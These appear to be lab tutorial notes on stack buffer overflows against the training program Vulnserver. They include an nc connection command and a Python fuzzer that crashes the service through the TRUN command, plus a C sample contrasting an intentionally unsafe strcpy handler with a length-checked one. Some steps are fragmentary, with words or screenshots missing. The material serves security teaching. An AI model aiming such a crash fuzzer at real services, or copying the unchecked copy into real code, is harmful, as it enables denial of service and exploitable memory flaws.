Introduction to Buffer Overflows

Anatomy of Memory


Anatomy of the Stack



Tools: Vulnserver, Immunity Debugger

Vulnserver Test

1. Open the vulnserver program on Windows.


2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0.0.XX 9999



3. Write the Python fuzzer test script on Kali Linux.

#!/usr/bin/python3
import socket

# Build test strings of increasing length: 1, 100, 300, 500, ... 5900 bytes
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A" * counter)
    counter = counter + 200

# Send each string as the argument of the TRUN command, one connection per string
for string in buffer:
    print("Fuzzing vulnserver with %s bytes" % len(string))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.0.XX', 9999))
    s.send(('TRUN /.:/' + string).encode())  # sockets take bytes in Python 3
    s.close()

Grant the rights to the script file and execute the

chmod 777


The vulnserver crashed with 5900 bytes.

Immunity Debugger


GUI Screenshot



Open or attach the vulnserver program.



Perform the on Kali Linux.




The vulnserver crashed finally.
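
Why an overlong TRUN argument can crash a service, and the length check that prevents it, as an added example (not from the original notes and not vulnserver's source). BUF_SIZE, handle_unsafe, handle_checked and try_length are hypothetical names, and the 2000-byte buffer is an assumed size.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 2000   /* assumed size for this sketch, not vulnserver's */

/* Unsafe pattern: copies the argument with no length check. Input longer than
 * buf overwrites adjacent stack data (saved registers, return address), which
 * is why a long string crashes the process. For contrast only; never called. */
void handle_unsafe(const char *arg) {
    char buf[BUF_SIZE];
    strcpy(buf, arg);   /* overflows when strlen(arg) >= BUF_SIZE */
    printf("handled %zu bytes\n", strlen(buf));
}

/* Hardened pattern: check the command and the length before copying.
 * Returns 0 on success, -1 if not a TRUN command, -2 if the argument is too long. */
int handle_checked(const char *msg, size_t msg_len, char *out, size_t out_size) {
    static const char prefix[] = "TRUN ";
    size_t plen = sizeof(prefix) - 1;
    if (msg_len < plen || memcmp(msg, prefix, plen) != 0)
        return -1;
    size_t arg_len = msg_len - plen;
    if (arg_len >= out_size)
        return -2;      /* reject instead of truncating or overflowing */
    memcpy(out, msg + plen, arg_len);
    out[arg_len] = '\0';
    return 0;
}

/* Builds "TRUN /.:/" followed by n 'A' bytes (the fuzzer's message shape)
 * and returns what the checked handler does with it. */
int try_length(size_t n) {
    static char msg[8192];
    char out[BUF_SIZE];
    size_t off = (size_t)snprintf(msg, sizeof(msg), "TRUN /.:/");
    if (off + n >= sizeof(msg)) return -3;
    memset(msg + off, 'A', n);
    return handle_checked(msg, off + n, out, sizeof(out));
}

int main(void) {
    size_t sizes[] = {1, 100, 1900, 5900};   /* lengths taken from the fuzzer's range */
    for (size_t i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++)
        printf("%zu bytes -> %d\n", sizes[i], try_length(sizes[i]));
    return 0;
}
```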

